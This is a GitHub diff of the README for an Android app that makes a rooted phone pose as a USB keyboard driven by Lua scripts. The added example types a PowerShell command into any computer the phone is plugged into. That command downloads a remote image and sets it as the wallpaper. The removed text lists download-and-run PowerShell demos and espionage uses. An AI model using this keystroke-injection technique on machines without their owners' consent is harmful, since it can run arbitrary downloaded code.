|
1 | | -# Android HID Script |
| 1 | +# Android USB Script |
2 | 2 |
|
3 | 3 | **Use at your own risk. For educational purposes only.** |
4 | 4 |
|
5 | | -An Android app that provides a simple Lua interface for emulating an HID device, on top of the existing `android-keyboard-gadget` patch by `pelya`. **Root access is required.** |
| 5 | +An Android app that provides a simple Lua interface for enumerating and interfacing |
| 6 | +with arbitrary composite USB devices. |
6 | 7 |
|
7 | | -## Requirements |
8 | | -**This app will not work on every Android device.** If your Android OS has Linux Kernel version >= 3.18 and is compiled with configfs and f_hid, then the app can try to create usb gadgets for mouse and keyboard. |
| 8 | +**Root access is required.** |
9 | 9 |
|
10 | | -If your Android OS is compiled with the [android-keyboard-gadget kernel patch](https://github.com/pelya/android-keyboard-gadget), then the app can use the usb gadgets it provides. |
| 10 | +The best way to explain what this app does is with a code example. The following script |
| 11 | +does the following when interpreted by this app: |
11 | 12 |
|
12 | | -## HID Emulation? |
13 | | -``` |
14 | | -In computing, the USB human interface device class (USB HID class) is a part of the USB |
15 | | -specification for computer peripherals: it specifies a device class (a type of computer |
16 | | -hardware) for human interface devices such as keyboards, mice, game controllers and |
17 | | -alphanumeric display devices. |
18 | | - - Wikipedia |
19 | | -``` |
20 | | -This app provides an easy way to script HID interactions intuitively, with feedback. In addition, it contains wrappers around the HID devices allowing developers to easily integrate HID functionality into their own apps. |
| 13 | +1. Configures your phone to become a USB keyboard |
| 14 | +2. Sends a series of key presses to the computer your phone is plugged in to, changing |
| 15 | +its wallpaper |
| 16 | + |
| 17 | +```lua |
| 18 | +-- create a USB composite device composed of a single keyboard |
| 19 | +usb = luausb.create({ id = 0, type = "keyboard" }) |
| 20 | +kb = usb.dev[1] |
| 21 | + |
| 22 | +local file = "https://i.redd.it/ur1mqcbpxou51.png" |
21 | 23 |
|
22 | | -On the news recently, use and abuse of the trust given to HID devices was demonstrated with the [BadUSB](https://www.wired.com/2014/07/usb-security/) attack, where USB devices were abused to utilize HID protocol to carry out nefarious actions. |
| 24 | +while true do |
| 25 | + -- wait for the phone to be plugged into a computer |
| 26 | + while not kb.test() do usb.delay(1000) end |
23 | 27 |
|
24 | | -## Use Cases of Scripted HID Emulation |
25 | | -- Automation of deployment solutions (ie. configuring computer BIOs settings in an automated fashion) |
26 | | -- Mobile password managers that type in your credentials for you, on computers you do not trust |
27 | | -- Use in computer espionage or social engineering attacks |
| 28 | + usb.delay(1000) |
28 | 29 |
|
29 | | -## Features |
30 | | -A couple of demo applications are implemented: |
31 | | -- Fuzzing of HID protocol |
32 | | -- PowerShell download and run executable |
33 | | -- PowerShell download and run PowerShell script |
34 | | -- Serial transfer of data through output reports |
35 | | -- Change wallpaper ([video demonstration](https://my.mixtape.moe/zxerjz.mp4)) |
| 30 | + kb.press_keys(kb.LSUPER, kb.R) -- open the Windows run dialog |
| 31 | + usb.delay(2000) -- wait 2 seconds |
| 32 | + kb.send_string("powershell\n") -- pop open a powershell window |
| 33 | + usb.delay(2000) |
36 | 34 |
|
37 | | -New demo applications can be added to `assets/scripts`. The API is pretty much self-documenting, just look at the existing demos to get a feel for how the API works. |
| 35 | + -- enter a script that changes your wallpaper |
| 36 | + kb.send_string("[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;" .. |
| 37 | + "(new-object System.Net.WebClient).DownloadFile('" .. file .. "',\"$Env:Temp\\b.jpg\");\n" .. |
| 38 | + "Add-Type @\"\n" .. |
| 39 | + "using System;using System.Runtime.InteropServices;using Microsoft.Win32;namespa" .. |
| 40 | + "ce W{public class S{ [DllImport(\"user32.dll\")]static extern int SystemParamet" .. |
| 41 | + "ersInfo(int a,int b,string c,int d);public static void SW(string a){SystemParam" .. |
| 42 | + "etersInfo(20,0,a,3);RegistryKey c=Registry.CurrentUser.OpenSubKey(\"Control Pan" .. |
| 43 | + "el\\\\Desktop\",true);c.SetValue(@\"WallpaperStyle\", \"2\");c.SetValue(@\"Tile" .. |
| 44 | + "Wallpaper\", \"0\");c.Close();}}}\n" .. |
| 45 | + "\"@\n" .. |
| 46 | + "[W.S]::SW(\"$Env:Temp\\b.jpg\")\n" .. |
| 47 | + "exit\n") |
| 48 | + |
| 49 | + -- wait for the phone to be unplugged |
| 50 | + while kb.test() do usb.delay(1000) end |
| 51 | +end |
| 52 | +``` |
| 53 | + |
| 54 | +## Requirements |
| 55 | +**This app will not work on every Android device.** If your Android OS has Linux Kernel |
| 56 | +version >= 3.18 and is compiled with configfs and f_hid, then the app can try to create usb |
| 57 | +gadgets. |
38 | 58 |
|
39 | | -For people who want to implement HID functionality in their own apps, HID interfacing code available [here (HID.java)](https://github.com/Netdex/android-hid-script/blob/master/app/src/main/java/cf/netdex/hidfuzzer/hid/HID.java), |
40 | | -and a simple ease-of-use wrapper is available [here (HIDR.java)](https://github.com/Netdex/android-hid-script/blob/master/app/src/main/java/cf/netdex/hidfuzzer/hid/HIDR.java). The documentation should be enough to understand how it works. |
| 59 | +New demo applications can be added to `assets/scripts`. The API is pretty much self-documenting, |
| 60 | +just look at the existing demos to get a feel for how the API works. |
41 | 61 |
|
42 | 62 | ## Third-party |
43 | | -- Requires ChainFire's [libsuperuser](https://github.com/Chainfire/libsuperuser) to keep a su shell open. |
44 | | -- Requires LuaJ to provide Lua binding and interpret Lua scripts. |
| 63 | +- [libsuperuser](https://github.com/Chainfire/libsuperuser) |
| 64 | +- [LuaJ](http://www.luaj.org/luaj/3.0/README.html) |
0 commit comments